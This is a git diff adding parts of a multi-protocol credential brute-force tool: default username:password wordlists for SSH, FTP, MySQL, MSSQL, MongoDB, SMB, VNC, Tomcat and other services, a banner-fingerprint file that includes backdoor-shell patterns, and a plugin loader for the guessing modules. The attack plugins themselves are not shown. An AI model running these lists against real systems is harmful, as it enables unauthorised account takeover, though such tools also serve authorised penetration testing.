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 literal 0 HcmV?d00001 diff --git a/Bruteforce/comm/printers.py b/Bruteforce/comm/printers.py new file mode 100644 index 0000000..8203b59 --- /dev/null +++ b/Bruteforce/comm/printers.py @@ -0,0 +1,78 @@ +import ctypes,sys +import platform + +if platform.system()=='Linux' or platform.system()=='Darwin': + class colors: + BLACK = '\033[0;30m' + DARK_GRAY = '\033[1;30m' + LIGHT_GRAY = '\033[0;37m' + BLUE = '\033[0;34m' + LIGHT_BLUE = '\033[1;34m' + GREEN = '\033[0;32m' + LIGHT_GREEN = '\033[1;32m' + CYAN = '\033[0;36m' + LIGHT_CYAN = '\033[1;36m' + RED = '\033[0;31m' + LIGHT_RED = '\033[1;31m' + PURPLE = '\033[0;35m' + LIGHT_PURPLE = '\033[1;35m' + BROWN = '\033[0;33m' + YELLOW = '\033[1;33m' + WHITE = '\033[1;37m' + DEFAULT_COLOR = '\033[00m' + RED_BOLD = '\033[01;31m' + ENDC = '\033[0m' + + def printRed(mess): + mess=mess.strip('\r\n') + print colors.RED + mess + colors.ENDC + + def printPink(mess): + mess=mess.strip('\r\n') + print colors.BLUE + mess+ colors.ENDC + + def printGreen(mess): + mess=mess.strip('\r\n') + print colors.GREEN + mess + colors.ENDC + + +if platform.system()=='Windows': + STD_INPUT_HANDLE = -10 + STD_OUTPUT_HANDLE = -11 + STD_ERROR_HANDLE = -12 + + FOREGROUND_BLACK = 0x0 + FOREGROUND_BLUE = 0x01 # text color contains blue. + FOREGROUND_GREEN = 0x02 # text color contains green. + FOREGROUND_RED = 0x04 # text color contains red. + + FOREGROUND_INTENSITY = 0x08 # text color is intensified. + BACKGROUND_BLUE = 0x10 # background color contains blue. + BACKGROUND_GREEN = 0x20 # background color contains green. + BACKGROUND_RED = 0x40 # background color contains red. + BACKGROUND_INTENSITY = 0x80 # background color is intensified. + + + std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE) + + def set_cmd_text_color(color, handle=std_out_handle): + Bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color) + return Bool + + def resetColor(): + set_cmd_text_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE) + + def printRed(mess): + set_cmd_text_color(FOREGROUND_RED | FOREGROUND_INTENSITY) + sys.stdout.write(mess) + resetColor() + + def printPink(mess): + set_cmd_text_color(FOREGROUND_RED | FOREGROUND_BLUE| FOREGROUND_INTENSITY) + print(mess) + resetColor() + + def printGreen(mess): + set_cmd_text_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY) + sys.stdout.write(mess) + resetColor() diff --git a/Bruteforce/comm/printers.pyc b/Bruteforce/comm/printers.pyc new file mode 100644 index 0000000000000000000000000000000000000000..1995bec4a4ac39e99e9b6dffaf74c50fc88d19de GIT binary patch literal 3280 zcmcImS#R4$5FS#JZTY^BxM+f+hk7EhdjM$>LtvN@a`?#|9P`^}Jv-{+=Jf2$rfY4A(n{uEbu-y+iZx2R3z zj&zG$YiPI0waK@sm7p6;u<6{UuoSZ-*wViyog}?YIz_LDXCAv4Pw>D^k)9M~g7lOq zlhmb{i?q1dw)8Z)Q>16eO_QD_cbfDZxih5a$(<#=K<*srMRMm!FOj=IdYRls(ktXH zkzOTtne-aDE94WkR;jf{t#$I#bOSsaSPl*1MN0)b$nY$A_v=q5OcoScMY zCP^;Rk|KAK)5Y*71^$%4PYZmc1@Ms;z(-mDA87%6qy_Mi7QjbZ03T^tk+iIms%2I< zhDnI+A0K|d`>-?6AH{UozZ=@2e?8POXQacv6SI$W*uRb0M>_0}V)l^^`!_NBNQZql zW{>NLjgyY}5&cx8AvCy5MuSdf4T|AMp4UC?_?~B`WzgyA%Qg?$L9U$5ADA?>LRKAk zMU_34Y32Q5sU8j4VXoY8Vs;tw@}hE_ikX2nT)<;qkw4B>Vk>0G<)xg0Y!}Vv5mV-{ zp$^NAnH@PA7$ihhJ*vp8W2aoM9!cCsrTw~N<}knD>}4C}x|gq(t4i>~sh6vk3lfJ@ zDdaPlMq?3v#>*a`{2Z8PmuDx3POW}&*1t6VPrZKAKWX+los)|`80`1MuP&~Yjp-an z_%XzU^)`P^W;$QIHjhizzCig&Q$gXq#Nk-fvI)iw))KT)ENMbv@tR7=a&9`qxfH~q z=?51Qi<*Z`Z9rsr3xV13!|AH)F|?ovlVSNE>M;4d`W;7=BRu)q@vm;nK& zG+?F#oY!EH#RC>kS^Nso?k{9Q_dtPhl;eM_{ON! zM?8ybZLg}FqN+A31&vpjocx}phWwRZAY4C-v_olzeJzFzw`te7v%`g zr+7HV!&rc+m84cm&XmU!{Ou8k$ixzeirbo5g@}RLuhgANZNGjDN7(o}I{47&-ldVF zyy^$WSG=(h<#rXUxankhBW4;|^VZ@UP;z06Q4UWHq%D>}q}Ska!ydy^d;*I5{+)%q z4QG3}1|ct7sW*gtyMy^;6!hn;eZk^O7I&3)?g0n5Vrh>^%jcoElPcahdOx&J4PKBP zDPJap--%ke%;jt-X(?PCwR*wZuN*e&UMX8C;KjZ)FjgD&m~}YSQL3tjQ(vnt`9O(| zPtw6;m4h@~aXEaw3@TH;NqBM07L_KKaLmXh%xsUDMr>F2@jyL*kZ+NqZ)!%DqF%*r zPyik(z>C^f#4kAvJiEmUYznJ?h`!67a03c=AU3U8`$KDGEuBm!XH(13cZWUr`WW7= PiNu;cn@lItsdVZe6|QQv literal 0 HcmV?d00001 diff --git a/Bruteforce/conf/.DS_Store b/Bruteforce/conf/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..5008ddfcf53c02e82d7eee2e57c38e5672ef89f6 GIT binary patch literal 6148 zcmeH~Jr2S!425mzP>H1@V-^m;4Wg<&0T*E43hX&L&p$$qDprKhvt+--jT7}7np#A3 zem<@ulZcFPQ@L2!n>{z**++&mCkOWA81W14cNZlEfg7;MkzE(HCqgga^y>{tEnwC%0;vJ&^%eQ zLs35+`xjp>T0 +[global] +task_type = 1 + + +[global] +logfile = ./log/log.txt diff --git a/Bruteforce/conf/ftp.conf b/Bruteforce/conf/ftp.conf new file mode 100644 index 0000000..4ce1ad1 --- /dev/null +++ b/Bruteforce/conf/ftp.conf @@ -0,0 +1,72 @@ +ftp:ftp@163.com +ftp:ftp +ftp:1 +ftp:12 +ftp:123 +ftp:1234 +ftp:12345 +ftp:123456 +ftp:1234567 +ftp:12345678 +ftp:123456789 +ftp:1234567890 +ftp:654321 +ftp:54321 +ftp:00000000 +ftp:88888888 +ftp:pass +ftp:password +ftp:passwd +ftp:!@#$%^ +ftp:1q2w3e +ftp:qawsed +ftp:pwd +ftp:1qaz2ws3e4 +ftp:qazwsxedc +ftp:!@#$%^&* +ftp:ftp21 +ftp:ftppass +ftp:ftp221 +ftp:ftppassword +ftp:ftppasswd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123123 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/ldapd.conf b/Bruteforce/conf/ldapd.conf new file mode 100644 index 0000000..0c6e377 --- /dev/null +++ b/Bruteforce/conf/ldapd.conf @@ -0,0 +1,27 @@ +Anonymous: +Manager:123456 +Manager:secret +Manager:1 +Manager:12 +Manager:123 +Manager:1234 +Manager:12345 +Manager:123456 +Manager:1234567 +Manager:12345678 +Manager:123456789 +Manager:1234567890 +Manager:654321 +Manager:54321 +Manager:00000000 +Manager:88888888 +Manager:pass +Manager:password +Manager:passwd +Manager:!@#$%^ +Manager:1q2w3e +Manager:qawsed +Manager:pwd +Manager:1qaz2ws3e4 +Manager:qazwsxedc +Manager:!@#$%^&* \ No newline at end of file diff --git a/Bruteforce/conf/mongodb.conf b/Bruteforce/conf/mongodb.conf new file mode 100644 index 0000000..00db698 --- /dev/null +++ b/Bruteforce/conf/mongodb.conf @@ -0,0 +1,115 @@ +anonymous: +mongodb:1 +mongodb:12 +mongodb:123 +mongodb:1234 +mongodb:12345 +mongodb:123456 +mongodb:1234567 +mongodb:12345678 +mongodb:123456789 +mongodb:1234567890 +mongodb:654321 +mongodb:54321 +mongodb:mongodb +mongodb:00000000 +mongodb:88888888 +mongodb:pass +mongodb:password +mongodb:passwd +mongodb:!@#$%^ +mongodb:1q2w3e +mongodb:qawsed +mongodb:pwd +mongodb:1qaz2ws3e4 +mongodb:qazwsxedc +mongodb:!@#$%^&* +mongodb:rootpass +mongodb:rootpassword +mongodb:rootpasswd +root:1 +root:12 +root:root +root:root123 +root:root123456 +root:123 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root:pass +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:test +root:qwe123 +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root123 +root:root123456 +root:rootpass +root:rootpassword +root:rootpasswd +root:admin +root:admin123 +root:- +root:_ +root:1qaz2wsx +root:666666 +root:888888 +root:123123 +root:toor +root:123abc +root:passw0rd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:123123 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/mssql.conf b/Bruteforce/conf/mssql.conf new file mode 100644 index 0000000..8c8042a --- /dev/null +++ b/Bruteforce/conf/mssql.conf @@ -0,0 +1,33 @@ +sa:1 +sa: +sa:sa +sa:sa123 +sa:12 +sa:123 +sa:1234 +sa:12345 +sa:123456 +sa:1234567 +sa:12345678 +sa:123456789 +sa:1234567890 +sa:654321 +sa:54321 +sa:00000000 +sa:88888888 +sa:pass +sa:password +sa:passwd +sa:!@#$%^ +sa:1q2w3e +sa:qawsed +sa:pwd +sa:1qaz2ws3e4 +sa:qazwsxedc +sa:!@#$%^&* +sa:sa1433 +sa:sapass +sa:sa1434 +sa:sapassword +sa:sapasswd +sa:aS6kR9auNM diff --git a/Bruteforce/conf/mysql.conf b/Bruteforce/conf/mysql.conf new file mode 100644 index 0000000..1ebee22 --- /dev/null +++ b/Bruteforce/conf/mysql.conf @@ -0,0 +1,75 @@ +root:1 +root:12 +root:123 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root: +root:root +root:root123 +root:root123456 +root:pass +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root3306 +root:rootpass +root:root3307 +root:rootpassword +root:rootpasswd +mysql:1 +mysql:12 +mysql:123 +mysql:1234 +mysql:12345 +mysql:123456 +mysql:1234567 +mysql:12345678 +mysql:123456789 +mysql:1234567890 +mysql:654321 +mysql:54321 +mysql:00000000 +mysql:mysql +mysql:88888888 +mysql:pass +mysql:password +mysql:passwd +mysql:!@#$%^ +mysql:1q2w3e +mysql:qawsed +mysql:pwd +mysql:1qaz2ws3e4 +mysql:qazwsxedc +mysql:!@#$%^&* +mysql:root3306 +mysql:rootpass +mysql:root3307 +mysql:rootpassword +mysql:rootpasswd +test:1 +test:123123 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123456789 +test:test +test:654321 \ No newline at end of file diff --git a/Bruteforce/conf/pop3.conf b/Bruteforce/conf/pop3.conf new file mode 100644 index 0000000..e69de29 diff --git a/Bruteforce/conf/postgres.conf b/Bruteforce/conf/postgres.conf new file mode 100644 index 0000000..2ba2c9f --- /dev/null +++ b/Bruteforce/conf/postgres.conf @@ -0,0 +1,64 @@ +root:1 +root:12 +root:123 +root:x90x00 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root:root +root:root123 +root:root123456 +root:pass +root:motianlun +root:mofashi +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root3306 +root:rootpass +root:root3307 +root:rootpassword +root:rootpasswd +postgres:1 +postgres:12 +postgres:123 +postgres:1234 +postgres:12345 +postgres:123456 +postgres:1234567 +postgres:12345678 +postgres:123456789 +postgres:1234567890 +postgres:postgres +postgres:654321 +postgres:54321 +postgres:88888888 +postgres:pass +postgres:password +postgres:passwd +postgres:!@#$%^ +postgres:1q2w3e +postgres:qawsed +postgres:pwd +postgres:1qaz2ws3e4 +postgres:qazwsxedc +postgres:!@#$%^&* +postgres:postgres654321 +postgres:postgres123456 +postgres:postgres123 +postgres:postgrespassword +postgres:postgrespasswd \ No newline at end of file diff --git a/Bruteforce/conf/signs.conf b/Bruteforce/conf/signs.conf new file mode 100644 index 0000000..080e022 --- /dev/null +++ b/Bruteforce/conf/signs.conf @@ -0,0 +1,80 @@ +http|^HTTP.* +http|^HTTP/0. +http|^HTTP/1. +http|.* +http|.* +http|.* +http|Bad Request .Invalid URL. +redis|ERR unknown command +redis|ERR wrong number of arguments +mongodb|^.*version.....([\.\d]+) +pop3|.*POP3.* +pop3|.*pop3.* +ssh|SSH-2.0-OpenSSH.* +ssh|SSH-1.0-OpenSSH.* +ssh|.*ssh.* +backdoor-fxsvc|^500 Not Loged in +backdoor-shell|GET: command +backdoor-shell|sh: GET: +bachdoor-shell|[a-z]*sh: .* command not found +backdoor-shell|^bash[$#] +backdoor-shell|^sh[$#] +backdoor-cmdshell|^Microsoft Windows .* Copyright .*> +ftp|^220.*\n331 +ftp|^220.*\n530 +ftp|^220.*FTP +ftp|^220 .* Microsoft .* FTP +ftp|^220 Inactivity timer +ftp|^220 .* UserGate +ftp|^220(.*?) +ldap|^\x30\x0c\x02\x01\x01\x61 +ldap|^\x30\x32\x02\x01 +ldap|^\x30\x33\x02\x01 +ldap|^\x30\x38\x02\x01 +ldap|^\x30\x84 +ldap|^\x30\x45 +ldap|^\x30.* +smb|^\0\0\0.\xffSMBr\0\0\0\0.* +mssql|^\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.* +mssql|^\x05\x6e\x00 +mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\0\x25\0\0\x01\0\0\0\x15\0\x06\x01.* +mssql|^\x04\x01\x00\x25\x00\x00\x01.* +mysql|^\x19\x00\x00\x00\x0a +mysql|^\x2c\x00\x00\x00\x0a +mysql|hhost \' +mysql|khost \' +mysql|mysqladmin +mysql|(.*)5(.*)log +mysql|(.*)4(.*)log +mysql|whost \' +mysql|^\(\x00\x00 +mysql|this MySQL +mysql|^N\x00 +mysql|(.*)mysql(.*) +mssql|;MSSQLSERVER; +oracle|\(ERROR_STACK=\(ERROR=\(CODE= +oracle|\(ADDRESS=\(PROTOCOL= +postgres|Invalid packet length +postgres|^EFATAL +rsync|^@RSYNCD:.* +snmp|\x70\x75\x62\x6c\x69\x63\xa2 +snmp|\x41\x01\x02 +ssh|^SSH- +ssh|^SSH-.*openssh +telnet|^\xff\xfd +telnet-disabled|Telnet is disabled now +telnet|^\xff\xfe +telnet|^xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd.* +vnc|^RFB.*' diff --git a/Bruteforce/conf/smb.conf b/Bruteforce/conf/smb.conf new file mode 100644 index 0000000..1ed9085 --- /dev/null +++ b/Bruteforce/conf/smb.conf @@ -0,0 +1,67 @@ +administrator:1 +administrator:12 +administrator: +administrator:administrator +administrator:123 +administrator:1234 +administrator:12345 +administrator:123456 +administrator:1234567 +administrator:12345678 +administrator:123456789 +administrator:1234567890 +administrator:654321 +administrator:54321 +administrator:00000000 +administrator:88888888 +administrator:pass +administrator:password +administrator:passwd +administrator:!@#$%^ +administrator:1q2w3e +administrator:qawsed +administrator:pwd +administrator:1qaz2ws3e4 +administrator:qazwsxedc +administrator:!@#$%^&* +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:123123 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/snmp.conf b/Bruteforce/conf/snmp.conf new file mode 100644 index 0000000..d70ebaa --- /dev/null +++ b/Bruteforce/conf/snmp.conf @@ -0,0 +1 @@ +public \ No newline at end of file diff --git a/Bruteforce/conf/ssh.conf b/Bruteforce/conf/ssh.conf new file mode 100644 index 0000000..e5e62af --- /dev/null +++ b/Bruteforce/conf/ssh.conf @@ -0,0 +1,86 @@ +root:1 +root:12 +root:root +root:root123 +root:root123456 +root:123 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root:pass +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:test +root:qwe123 +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root123 +root:root123456 +root:rootpass +root:rootpassword +root:rootpasswd +root:admin +root:admin123 +root:- +root:_ +root:1qaz2wsx +root:666666 +root:888888 +root:123123 +root:toor +root:123abc +root:passw0rd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:123123 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 diff --git a/Bruteforce/conf/tomcat.conf b/Bruteforce/conf/tomcat.conf new file mode 100644 index 0000000..4eb9405 --- /dev/null +++ b/Bruteforce/conf/tomcat.conf @@ -0,0 +1,69 @@ +tomcat:1 +tomcat:12 +tomcat:tomcat +tomcat:tomcat123 +tomcat:tomcat123456 +tomcat:123 +tomcat:1234 +tomcat:12345 +tomcat:123456 +tomcat:1234567 +tomcat:12345678 +tomcat:123456789 +tomcat:1234567890 +tomcat:654321 +tomcat:54321 +tomcat:00000000 +tomcat:88888888 +tomcat:pass +tomcat:password +tomcat:passwd +tomcat:!@#$%^ +tomcat:1q2w3e +tomcat:qawsed +tomcat:pwd +tomcat:1qaz2ws3e4 +tomcat:qazwsxedc +tomcat:!@#$%^&* +tomcat:s3cret +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:123123 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/vnc.conf b/Bruteforce/conf/vnc.conf new file mode 100644 index 0000000..9d690c9 --- /dev/null +++ b/Bruteforce/conf/vnc.conf @@ -0,0 +1,34 @@ +root +vnc +vnc123 +vncpass +vnc123456 +vncpassword +vncpasswd +123 +1234 +12345 +123456 +1234567 +12345678 +123456789 +1234567890 +654321 +rootpass +54321 +00000000 +88888888 +pass +password +passwd +!@#$%^ +1q2w3e +qawsed +pwd +1qaz2ws3e4 +qazwsxedc +!@#$%^&* +root123 +root123456 +rootpassword +rootpasswd \ No newline at end of file diff --git a/Bruteforce/conf/web.conf b/Bruteforce/conf/web.conf new file mode 100644 index 0000000..b4db38f --- /dev/null +++ b/Bruteforce/conf/web.conf @@ -0,0 +1,69 @@ +cisco:1 +cisco:12 +cisco:cisco +cisco:123 +cisco:1234 +cisco:12345 +cisco:123456 +cisco:1234567 +cisco:12345678 +cisco:123456789 +cisco:1234567890 +cisco:654321 +cisco:54321 +cisco:00000000 +cisco:88888888 +cisco:pass +cisco:password +cisco:passwd +cisco:!@#$%^ +cisco:1q2w3e +cisco:qawsed +cisco:pwd +cisco:1qaz2ws3e4 +cisco:qazwsxedc +cisco:!@#$%^&* +cisco:rootpass +cisco:rootpassword +cisco:rootpasswd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:123123 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/factorys/__init__.py b/Bruteforce/factorys/__init__.py new file mode 100644 index 0000000..013e4b7 --- /dev/null +++ b/Bruteforce/factorys/__init__.py @@ -0,0 +1 @@ +#!/usr/bin/python diff --git a/Bruteforce/factorys/__init__.pyc b/Bruteforce/factorys/__init__.pyc new file mode 100644 index 0000000000000000000000000000000000000000..497125a80f9ccf56330d92310bb5b7297e0d08b5 GIT binary patch literal 150 zcmZSn%*(awLr_>U0~9afB*mh literal 0 HcmV?d00001 diff --git a/Bruteforce/factorys/pluginFactory.py b/Bruteforce/factorys/pluginFactory.py new file mode 100644 index 0000000..b64b07c --- /dev/null +++ b/Bruteforce/factorys/pluginFactory.py @@ -0,0 +1,101 @@ +# coding: utf-8 +__author__="wilson" +import os +import sys + +sys.path.append("../") + +from plugins.ftp import * +from plugins.smb import * +from plugins.mysql import * +from plugins.mssql import * +from plugins.ldapd import * +from plugins.mongodb import * +from plugins.redisexp import * +from plugins.rsync import * +from plugins.snmp import * +from plugins.ssh import * +from plugins.ssltest import * +from plugins.vnc import * +from plugins.web import * + +def ftpburp(c): + t = ftp_burp(c) + return t + +def smbburp(c): + t = smb_burp(c) + return t + +def mysqlburp(c): + t = mysql_burp(c) + return t + +def mssqlburp(c): + t = mssql_burp(c) + return t + +def ldapburp(c): + t = ldap_burp(c) + return t + +def mongodbburp(c): + t = mongodb_burp(c) + return t + +def redisburp(c): + t = redis_burp(c) + return t + +def rsyncburp(c): + t = rsync_burp(c) + return t + +def snmpburp(c): + t = snmp_burp(c) + return t + +def sshburp(c): + t = ssh_burp(c) + return t + +def sslburp(c): + t = ssl_burp(c) + return t + +def vncburp(c): + t = vnc_burp(c) + return t + +def webburp(c): + t = web_burp(c) + return t +#类 +class pluginFactory(): + def __init__(self,c): + self.pluginList=[] + self.config=c + self.pluginCategory= { + "ftp":ftpburp, + "smb":smbburp, + "mysql":mysqlburp, + "mssql":mssqlburp, + "ldap":ldapburp, + "mongodb":mongodbburp, + "redis":redisburp, + "rsync":rsyncburp, + "snmp":snmpburp, + "ssh":sshburp, + "ssl":sslburp, + "vnc":vncburp, + "web":webburp, + } + self.get_pluginList() + + + def get_pluginList(self): + for name in self.pluginCategory: + #实例化每个类 + result_t=self.pluginCategory.get(name)(self.config) + self.pluginList.append(result_t) + diff --git a/Bruteforce/factorys/pluginFactory.pyc b/Bruteforce/factorys/pluginFactory.pyc new file mode 100644 index 0000000000000000000000000000000000000000..f94693233120e61100cac54c9c1dd3525525311b GIT binary patch literal 4320 